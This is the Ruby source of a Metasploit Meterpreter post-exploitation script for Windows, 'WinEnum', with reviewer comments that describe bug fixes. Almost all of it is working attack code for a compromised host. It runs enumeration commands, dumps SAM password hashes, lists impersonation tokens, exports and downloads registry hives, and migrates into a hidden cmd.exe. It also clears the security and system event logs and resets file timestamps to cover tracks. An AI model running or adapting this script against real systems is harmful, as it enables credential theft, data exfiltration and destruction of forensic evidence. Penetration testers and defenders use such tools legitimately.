  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. ################## Variable Declarations ##################
@client = client
# Command-line options understood by this script. -m, -r and -c only set the
# flags below, which the MAIN section acts on; -h prints the help and ends the script.
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-m" => [ false, "Migrate the Meterpreter Session from it current process to a new cmd.exe before doing anything" ],
  "-r" => [ false, "Dump, compress and download entire Registry" ],
  "-c" => [ false, "Change Access, Modified and Created times of executables that were run on the target machine and clear the EventLog" ]
)
# Option flags: nil when the option was not given, 1 when it was
# (rd = dump the registry, mg = migrate first, cm = cover tracks).
rd = nil
mg = nil
cm = nil
opts.parse(args) { |opt, idx, val|
  case opt
  when '-r'
    rd = 1
  when '-m'
    mg = 1
  when '-c'
    cm = 1
  when "-h"
    print_line "WinEnum -- Windows local enumeration"
    print_line
    print_line "Retrieves all kinds of information about the system"
    print_line "including environment variables, network interfaces,"
    print_line "routing, user accounts, and much more. Results are"
    print_line "stored in #{::File.join(Msf::Config.log_directory,'scripts', 'winenum')}"
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
}
#-------------------------------------------------------------------------------
host,port = @client.session_host, @client.session_port
info = @client.sys.config.sysinfo
# Create Filename info to be appended to downloaded files
# NOTE(review): the format has no hour field (%Y%m%d.%M%S), so two runs in
# different hours at the same minute and second share a log directory; confirm
# whether that is intended before changing it.
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs:
# <msf log dir>/scripts/winenum/<computer name + filenameinfo>
logs = ::File.join(Msf::Config.log_directory,'scripts', 'winenum',Rex::FileUtils.clean_path(info['Computer'] + filenameinfo))
@logfol = logs
# Create the log directory (this happens before the platform check further down)
::FileUtils.mkdir_p(logs)
# General report file; the functions below append their notes to it with file_local_write
@dest = logs + "/" + Rex::FileUtils.clean_path(info['Computer'] + filenameinfo) + ".txt"
# Commands that will be ran on the Target by list_exec. MAIN removes
# 'netstat -vb' and 'netsh firewall show config' on early Windows XP builds.
commands = [
  'cmd.exe /c set',
  'arp -a',
  'ipconfig /all',
  'ipconfig /displaydns',
  'route print',
  'net view',
  'netstat -nao',
  'netstat -vb',
  'netstat -ns',
  'net accounts',
  'net accounts /domain',
  'net session',
  'net share',
  'net group',
  'net user',
  'net localgroup',
  'net localgroup administrators',
  'net group administrators',
  'net view /domain',
  'netsh firewall show config',
  'tasklist /svc',
  'tasklist /m',
  'gpresult /SCOPE COMPUTER /Z',
  'gpresult /SCOPE USER /Z'
]
# Windows 2008 Commands, appended to `commands` on Windows 2008
win2k8cmd = [
  'servermanagercmd.exe -q',
  'cscript /nologo winrm get winrm/config',
]
# Executables whose MACE timestamps chmace resets; names are relative to
# %WinDir%\system32 (chmace prepends that path)
cmdstomp = [
  'cmd.exe',
  'reg.exe',
  'ipconfig.exe',
  'route.exe',
  'net.exe',
  'netstat.exe',
  'netsh.exe',
  'makecab.exe',
  'tasklist.exe',
  'wbem\\wmic.exe',
  'gpresult.exe'
]
# WMIC queries that will be executed on the Target by wmicexec
wmic = [
  'useraccount list',
  'group list',
  'service list brief',
  'volume list brief',
  'logicaldisk get description,filesystem,name,size',
  'netlogin get name,lastlogon,badpasswordcount',
  'netclient list brief',
  'netuse get name,username,connectiontype,localname',
  'share get name,path',
  'nteventlog get path,filename,writeable',
  'process list brief',
  'startup list full',
  'rdtoggle list',
  'product get name,version',
  'qfe',
]
# Specific Commands for Windows Vista/7 for Wireless Enumeration
# (appended to `commands` on those versions)
vstwlancmd = [
  'netsh wlan show interfaces',
  'netsh wlan show drivers',
  'netsh wlan show profiles',
  'netsh wlan show networks mode=bssid',
]
# Commands that are not present in Windows 2000; MAIN subtracts this list from
# `commands` on Windows 2000.
# NOTE(review): covertracks also refers to this name, but a script-level local
# is not visible inside a `def`.
nonwin2kcmd = [
  'netsh firewall show config',
  'tasklist /svc',
  'gpresult /SCOPE COMPUTER /Z',
  'gpresult /SCOPE USER /Z',
  'prnport -l',
  'prnmngr -g',
  'tasklist.exe',
  'wbem\\wmic.exe',
  'netsh.exe',
]
# Executables not present in Windows 2000; MAIN subtracts this list from
# cmdstomp before calling covertracks on Windows 2000
nowin2kexe = [
  'netsh.exe',
  'gpresult.exe',
  'tasklist.exe',
  'wbem\\wmic.exe',
]
  140. ################## Function Declarations ##################
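# Extract the installed-software list from the Uninstall registry keys (HKLM and
# HKCU) and write it as "DisplayName,DisplayVersion" rows to
# <@logfol>/programs_list.csv. Keys are read by up to 10 threads at a time.
#
# Fixes relative to the original:
# - each row ends with a newline (the original concatenated every row on one line);
# - the 11th key of every batch is no longer skipped (the original only waited
#   in its `else` branch and never looked that key up);
# - all worker threads are joined before the CSV is written, so it is complete.
def findprogs()
  print_status("Extracting software list from registry")
  proglist = ""
  workers = []
  max_workers = 10
  appkeys = ['HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
             'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' ]
  appkeys.each do |keyx86|
    soft_keys = registry_enumkeys(keyx86)
    next unless soft_keys
    soft_keys.each do |k|
      # Drain the batch before starting another thread; the current key is still read.
      if workers.size >= max_workers
        workers.each(&:join)
        workers.clear
      end
      worker = ::Thread.new do
        begin
          dispnm = registry_getvaldata("#{keyx86}\\#{k}","DisplayName")
          dispversion = registry_getvaldata("#{keyx86}\\#{k}","DisplayVersion")
          proglist << "#{dispnm},#{dispversion}\n"
        rescue
          # best effort, as before: a key without the expected values is skipped
        end
      end
      workers << worker
    end
  end
  workers.each(&:join)
  file_local_write("#{@logfol}/programs_list.csv",proglist)
end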
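# Check whether the target is a virtual machine and return a short report
# string ('' when nothing was recognised). Two registry sources are consulted:
# the BIOS SystemManufacturer value first, then the SCSI "Identifier" of the
# first disk, which also works when no vendor tools are installed.
# Note: will add soon Hyper-v and Citrix Xen check.
#
# Fixes relative to the original: the VirtualBox match is case-insensitive like
# the other matches (the identifier is downcased once), the Xen result from the
# BIOS check is recorded in the report instead of only being printed, and only
# StandardError is rescued.
def chkvm()
  check = nil
  vmout = ''
  info = @client.sys.config.sysinfo
  print_status "Checking if #{info['Computer']} is a Virtual Machine ........"
  # Check for Target Machines if running in VM, only fo VMware Workstation/Fusion
  begin
    key = 'HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS'
    root_key, base_key = @client.sys.registry.splitkey(key)
    open_key = @client.sys.registry.open_key(root_key,base_key,KEY_READ)
    v = open_key.query_value('SystemManufacturer')
    sysmnfg = v.data.downcase
    if sysmnfg =~ /vmware/
      print_status "\tThis is a VMware Workstation/Fusion Virtual Machine"
      vmout << "This is a VMware Workstation/Fusion Virtual Machine\n\n"
      check = 1
    elsif sysmnfg =~ /xen/
      print_status("\tThis is a Xen Virtual Machine.")
      vmout << "This is a Xen Virtual Machine.\n\n"
      check = 1
    end
  rescue
    # key missing or unreadable: fall through to the second source
  end
  if check != 1
    begin
      # Registry path using the HD and CD rom entries in the registry in case
      # proprietary tools are not installed.
      key2 = "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"
      root_key2, base_key2 = @client.sys.registry.splitkey(key2)
      open_key2 = @client.sys.registry.open_key(root_key2,base_key2,KEY_READ)
      ident = open_key2.query_value('Identifier').data.downcase
      if ident =~ /vmware/
        print_status "\tThis is a VMWare virtual Machine"
        vmout << "This is a VMWare virtual Machine\n\n"
      elsif ident =~ /vbox/
        print_status "\tThis is a Sun VirtualBox virtual Machine"
        vmout << "This is a Sun VirtualBox virtual Machine\n\n"
      elsif ident =~ /xen/
        print_status "\tThis is a Xen virtual Machine"
        vmout << "This is a Xen virtual Machine\n\n"
      elsif ident =~ /virtual hd/
        print_status "\tThis is a Hyper-V/Virtual Server virtual Machine"
        vmout << "This is a Hyper-v/Virtual Server virtual Machine\n\n"
      end
    rescue
      # no identifier available: the report stays as it is
    end
  end
  vmout
end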
  221. #-------------------------------------------------------------------------------
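# Run every command in cmdlst on the target, at most 10 at a time, and save each
# command's output to <@logfol>/<command with non-word characters replaced by _>.txt.
# Returns nil; the output only goes to the files.
#
# Fixes relative to the original: the output file is written once, after the
# channel is drained (the original appended the growing buffer on every chunk,
# so files contained repeated output); the 11th command of each batch is no
# longer skipped; a failing command is reported instead of dying silently in
# its thread.
#
# @param cmdlst [Array<String>] command lines to execute
def list_exec(cmdlst)
  print_status("Running Command List ...")
  workers = []
  max_workers = 10
  @client.response_timeout=120
  cmdlst.each do |cmd|
    # Drain the batch before starting another thread; the current command is still run.
    if workers.size >= max_workers
      workers.each(&:join)
      workers.clear
    end
    worker = ::Thread.new do
      begin
        cmdout = ""
        print_status "\trunning command #{cmd}"
        r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
        while(d = r.channel.read)
          cmdout << d
        end
        file_local_write("#{@logfol}/#{cmd.gsub(/(\W)/,"_")}.txt",cmdout)
        r.channel.close
        r.close
      rescue => e
        print_status("Error running command #{cmd}: #{e.class} #{e}")
      end
    end
    workers << worker
  end
  workers.each(&:join)
  nil
end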
  250. #-------------------------------------------------------------------------------
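# Run each WMIC query in wmiccmds on the target, at most 10 at a time. Every
# query appends CSV output to a random-named file under %TEMP% on the target;
# that file is read back, saved as
# <@logfol>/wmic_<query with non-word characters replaced by _>.csv and deleted.
#
# Fixes relative to the original: the 11th query of each batch is no longer
# skipped; the result is written with file_local_write like every other write in
# this script (the original called filewrt, which this file does not define);
# the wait for wmic.exe to exit no longer spins forever when the process list is
# empty; a failing query is reported instead of dying silently; only
# StandardError is rescued.
#
# @param wmiccmds [Array<String>] WMIC argument strings, e.g. 'useraccount list'
def wmicexec(wmiccmds= nil)
  print_status("Running WMIC Commands ....")
  workers = []
  max_workers = 10
  @client.response_timeout=120
  begin
    tmp = @client.sys.config.getenv('TEMP')
    wmiccmds.each do |wmi|
      # Drain the batch before starting another thread; the current query is still run.
      if workers.size >= max_workers
        workers.each(&:join)
        workers.clear
      end
      worker = ::Thread.new do
        begin
          tmpout = ''
          wmicfl = tmp + "\\#{sprintf("%.5d",rand(100000))}.csv"
          print_status "\trunning command wmic #{wmi}"
          flname = "#{@logfol}/wmic_#{wmi.gsub(/(\W)/,"_")}.csv"
          r = @client.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi} /format:csv", nil, {'Hidden' => true})
          sleep(2)
          # Wait until no wmic.exe is running so the next query does not race this one
          prog2check = "wmic.exe"
          loop do
            still_running = @client.sys.process.get_processes().any? { |x| prog2check == (x['name'].downcase) }
            break unless still_running
            sleep(0.5)
          end
          r.close
          # Read output of WMIC back from the target
          wmioutfile = @client.fs.file.new(wmicfl, "rb")
          until wmioutfile.eof?
            tmpout << wmioutfile.read
          end
          wmioutfile.close
          # Create file with output of command
          file_local_write(flname,tmpout)
          # Delete created file on disk; best effort
          begin
            @client.fs.file.rm(wmicfl)
          rescue
          end
        rescue => e
          print_status("Error running wmic #{wmi}: #{e.class} #{e}")
        end
      end
      workers << worker
    end
    workers.each(&:join)
  rescue => e
    print_status("Error running WMIC commands: #{e.class} #{e}")
  end
end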
  305. #-------------------------------------------------------------------------------
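# Dump the SAM password hashes through the priv extension and save them to
# <@logfol>/hashdump.txt, one hash per line followed by three blank lines.
# Errors are reported, not raised; the file then receives whatever was
# collected (normally nothing).
#
# Fixes relative to the original: only StandardError is rescued (`rescue
# ::Exception` also swallowed interrupts), the pause uses sleep instead of
# select, and the buffer is created before the begin block.
def gethash()
  print_status("Dumping password hashes...")
  hash = ''
  begin
    @client.core.use("priv")
    # fixed pause kept from the original, presumably to let the extension settle
    sleep(3)
    hashes = @client.priv.sam_hashes
    hashes.each do |h|
      hash << h.to_s+"\n"
    end
    hash << "\n\n\n"
    print_status("Hashes Dumped")
  rescue => e
    print_status("\tError dumping hashes: #{e.class} #{e}")
    print_status("\tPayload may be running with insuficient privileges!")
  end
  flname = "#{@logfol}/hashdump.txt"
  file_local_write(flname,hash)
end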
  326. #-------------------------------------------------------------------------------
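# List the delegation and impersonation tokens the incognito extension reports,
# first for index 0 (labelled "User") then index 1 (labelled "Group"), and save
# the report to <@logfol>/tokens.txt. Errors are reported, not raised.
#
# Fixes relative to the original: only StandardError is rescued, and the report
# buffer is created before the begin block so the file write always gets a string.
def listtokens()
  dt = ''
  begin
    print_status("Getting Tokens...")
    @client.core.use("incognito")
    dt << "****************************\n"
    dt << " List of Available Tokens\n"
    dt << "****************************\n\n"
    %w[User Group].each_with_index do |token_type, idx|
      tokens = @client.incognito.incognito_list_tokens(idx)
      dt << "#{token_type} Delegation Tokens Available \n"
      dt << "======================================== \n"
      tokens['delegation'].each_line{ |string|
        dt << string + "\n"
      }
      dt << "\n"
      dt << "#{token_type} Impersonation Tokens Available \n"
      dt << "======================================== \n"
      tokens['impersonation'].each_line{ |string|
        dt << string + "\n"
      }
    end
    print_status("All tokens have been processed")
  rescue => e
    print_status("Error Getting Tokens: #{e.class} #{e}")
  end
  file_local_write("#{@logfol}/tokens.txt",dt)
end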
  364. #-------------------------------------------------------------------------------
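# Clear the listed Windows event logs on the target and note each one in the
# general report (@dest). The first failure stops the loop, as before. The
# clearing itself is still recorded by Windows (the status message below refers
# to event 517), so the action is not trace-free.
#
# Fix relative to the original: only StandardError is rescued.
def clrevtlgs()
  evtlogs = [
    'security',
    'system',
    'application',
    'directory service',
    'dns server',
    'file replication service'
  ]
  print_status("Clearing Event Logs, this will leave and event 517")
  begin
    evtlogs.each do |evl|
      print_status("\tClearing the #{evl} Event Log")
      log = @client.sys.eventlog.open(evl)
      log.clear
      file_local_write(@dest,"Cleared the #{evl} Event Log")
    end
    print_status("All Event Logs have been cleared")
  rescue => e
    print_status("Error clearing Event Log: #{e.class} #{e}")
  end
end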
  388. #-------------------------------------------------------------------------------
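# Function for Changing Access Time, Modified Time and Created Time of Files Supplied in an Array
# The files have to be in %WinDir%\System32 folder: the timestamps of
# %WinDir%\system32\chkdsk.exe are copied onto each one and every change is
# noted in the general report (@dest). A failure on one file is reported and
# the next file is tried.
#
# Fixes relative to the original: the priv extension is loaded once, before the
# loop, instead of on every iteration (if that fails nothing can be changed, so
# the error is reported and the function returns); the unused `windir = ''`
# assignment is gone; only StandardError is rescued.
#
# @param cmds [Array<String>] file names relative to %WinDir%\system32
def chmace(cmds)
  print_status("Changing Access Time, Modified Time and Created Time of Files Used")
  begin
    @client.core.use("priv")
  rescue => e
    print_status("Error changing MACE: #{e.class} #{e}")
    return
  end
  windir = @client.sys.config.getenv('WinDir')
  fl2clone = windir + "\\system32\\chkdsk.exe"
  cmds.each do |c|
    begin
      filetostomp = windir + "\\system32\\"+ c
      print_status("\tChanging file MACE attributes on #{filetostomp}")
      @client.priv.fs.set_file_mace_from_file(filetostomp, fl2clone)
      file_local_write(@dest,"Changed MACE of #{filetostomp}")
    rescue => e
      print_status("Error changing MACE: #{e.class} #{e}")
    end
  end
end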
  408. #-------------------------------------------------------------------------------
#Dumping and Downloading the Registry of the target machine
# Each hive is exported with reg.exe into %WinDir%\Temp, packed with makecab,
# downloaded into pathoflogs, and the leftovers under %WinDir%\Temp are deleted.
#
# @param pathoflogs [String] local directory the .cab files are downloaded into
# @param filename [String] NOTE(review): not used anywhere in this body. The text
#   "#(unknown)" in the paths below is a literal, not an interpolation (no braces),
#   so the remote files are named e.g. "HKLM#(unknown).reg"; it reads like a
#   mangled "#{filename}" — confirm against the upstream script before changing it.
def regdump(pathoflogs,filename)
  # port is assigned but not used below
  host,port = @client.session_host, @client.session_port
  #This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
  garbage = ''
  hives = %w{HKCU HKLM HKCC HKCR HKU}
  windir = @client.sys.config.getenv('WinDir')
  print_status('Dumping and Downloading the Registry')
  hives.each do |hive|
    begin
      print_status("\tExporting #{hive}")
      # 'Hidden' => 'true' is a String here, where list_exec passes the boolean true; both are truthy
      r = @client.sys.process.execute("cmd.exe /c reg.exe export #{hive} #{windir}\\Temp\\#{hive}#(unknown).reg", nil, {'Hidden' => 'true','Channelized' => true})
      # Drain the channel so the export has finished before compressing
      while(d = r.channel.read)
        garbage << d
      end
      r.channel.close
      r.close
      print_status("\tCompressing #{hive} into cab file for faster download")
      r = @client.sys.process.execute("cmd.exe /c makecab #{windir}\\Temp\\#{hive}#(unknown).reg #{windir}\\Temp\\#{hive}#(unknown).cab", nil, {'Hidden' => 'true','Channelized' => true})
      while(d = r.channel.read)
        garbage << d
      end
      r.channel.close
      r.close
    rescue ::Exception => e
      # NOTE(review): rescuing Exception also swallows interrupts and exit; StandardError would do
      print_status("Error dumping Registry Hives #{e.class} #{e}")
    end
  end
  #Downloading compressed registry Hives
  hives.each do |hive|
    begin
      print_status("\tDownloading #{hive}#(unknown).cab to -> #{pathoflogs}/#{host}-#{hive}#(unknown).cab")
      @client.fs.file.download_file("#{pathoflogs}/#{host}-#{hive}#(unknown).cab", "#{windir}\\Temp\\#{hive}#(unknown).cab")
      file_local_write(@dest,"Dumped and Downloaded #{hive} Registry Hive")
      # fixed pause between downloads, kept from the original
      sleep(5)
    rescue ::Exception => e
      print_status("Error Downloading Registry Hives #{e.class} #{e}")
    end
  end
  #Deleting left over files
  print_status("\tDeleting left over files")
  # Not channelized and not waited for: the function returns before the delete is known to have finished
  @client.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
end
  452. #-------------------------------------------------------------------------------
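# Function that will call 2 other Functions to cover all tracks: clear the event
# logs, then reset the MACE timestamps of the executables named in cmdstomp.
# The caller is responsible for removing executables that do not exist on the
# target OS (the MAIN section subtracts nowin2kexe on Windows 2000).
#
# Fix relative to the original: on Windows 2000 it evaluated
# `cmdstomp - nonwin2kcmd`, but nonwin2kcmd is a local of the script body and
# locals are not visible inside a `def`, so that branch raised NameError after
# the logs had already been cleared. The OS check is therefore dropped.
#
# @param cmds [Array<String>] file names relative to %WinDir%\system32, passed to chmace
def covertracks(cmdstomp)
  clrevtlgs()
  chmace(cmdstomp)
end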
  464. #-------------------------------------------------------------------------------
  465. # Functions Provided by natron (natron 0x40 invisibledenizen 0x2E com)
  466. # for Process Migration
  467. #---------------------------------------------------------------------------------------------------------
# Start a hidden, non-channelized process on the target and return the process
# object handed back by @client.sys.process.execute.
#
# @param target [String] command line to execute
# @return the new process object (has #pid)
def launchProc(target)
  print_status("Launching hidden #{target}...")
  # Execution options; kept together so they are easy to adjust
  exec_opts = {
    'Channelized' => nil,
    'Hidden' => true,
    'InMemory' => nil,
    'UseThreadToken' => false
  }
  spawned = @client.sys.process.execute(target, nil, exec_opts)
  print_status("Process #{spawned.pid} created.")
  spawned
end
  485. #-------------------------------------------------------------------------------
# Migrate the session into newproc and return the pid of the process the
# session was in before, so the caller can decide what to do with it.
#
# @param newproc process object to migrate into (must respond to #pid)
# @return [Integer] pid of the previous server process
def migrateToProc(newproc)
  current = @client.sys.process.open
  print_status("Current process is #{current.name} (#{current.pid}). Migrating to #{newproc.pid}.")
  previous_pid = current.pid
  @client.core.migrate(newproc.pid.to_i)
  print_status("Migration completed successfully.")
  landed = @client.sys.process.open
  print_status("New server process: #{landed.name} (#{landed.pid})")
  previous_pid
end
  500. #-------------------------------------------------------------------------------
# Terminate the process with the given pid on the target and report it.
#
# @param procpid [Integer] pid of the process to kill
def killApp(procpid)
  process_api = @client.sys.process
  process_api.kill(procpid)
  print_status("Old process #{procpid} killed.")
end
  505. #---------------------------------------------------------------------------------------------------------
# Function to execute process migration: spawn a hidden cmd.exe and move the
# session into it. The previous process is intentionally left alive, because
# killing it can be dangerous depending on the service exploited.
#
# @return [Integer] pid of the process the session was in before
def migrate()
  spawned = launchProc('cmd.exe')
  migrateToProc(spawned)
  # killApp(previous pid) deliberately not called, see above
end
  514. #---------------------------------------------------------------------------------------------------------
#Function for Checking for UAC: prints whether UAC is enabled and returns the result
# @return the value of is_uac_enabled?
def uaccheck()
  enabled = is_uac_enabled?
  print_status(enabled ? "\tUAC is Enabled" : "\tUAC is Disabled")
  enabled
end
#check for proper Meterpreter Platform: report the problem and end the script
def unsupported
  message = "This version of Meterpreter is not supported with this Script!"
  print_error(message)
  raise Rex::Script::Completed
end
  530. unsupported if client.platform != 'windows'
  531. ################## MAIN ##################
  532. # Execute Functions selected
# Execute Functions selected: migrate first when -m was given
migrate() if mg
# Main part of script, it will run all function minus the ones
# that will chance the MACE and Clear the Event log.
print_status("Running Windows Local Enumeration Meterpreter Script")
print_status("New session on #{host}:#{port}...")
# Header for File that will hold all the output of the commands
info = @client.sys.config.sysinfo
header = [
  "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}",
  "Running as: #{@client.sys.config.getuid}",
  "Host: #{info['Computer']}",
  "OS: #{info['OS']}",
  "", "", ""
].join("\n") + "\n"
print_status("Saving general report to #{@dest}")
print_status("Output of each individual command is saved to #{@logfol}")
file_local_write(@dest,header)
file_local_write(@dest,chkvm())
trgtos = info['OS']
uac = uaccheck()
# Run Commands according to OS some commands are not available on all versions of Windows
case trgtos
when /(Windows XP)/
  # RTM and SP1 lack netstat -vb and the netsh firewall context
  if trgtos =~ /(2600, \)|2600, Service Pack 1\))/
    commands.delete('netstat -vb')
    commands.delete('netsh firewall show config')
  end
  list_exec(commands)
  wmicexec(wmic)
  findprogs()
  gethash()
when /(Windows .NET)/
  list_exec(commands)
  wmicexec(wmic)
  findprogs()
  gethash()
when /(Windows 2008)/
  list_exec(commands + win2k8cmd)
  wmicexec(wmic)
  findprogs()
  if is_system?
    gethash()
  else
    print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
  end
when /Windows (Vista|7)/
  list_exec(commands + vstwlancmd)
  # Check for UAC and save results
  file_local_write(@dest, uac ? "UAC is Enabled" : "UAC is Disabled")
  wmicexec(wmic)
  findprogs()
  if is_system?
    gethash()
  else
    print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.")
  end
when /(Windows 2000)/
  list_exec(commands - nonwin2kcmd)
  gethash()
end
listtokens()
# -r: registry dump, only attempted when UAC is off
if rd
  if uac
    print_status("UAC is enabled, Registry Keys could not be dumped under current privileges")
  else
    regdump(logs,filenameinfo)
  end
end
# -c: cover tracks; executables missing on Windows 2000 are removed first
if cm
  if trgtos =~ /(Windows 2000)/
    covertracks(cmdstomp - nowin2kexe)
  elsif uac
    print_status("UAC is enabled, Logs could not be cleared under current privileges")
  else
    covertracks(cmdstomp)
  end
end
print_status("Done!")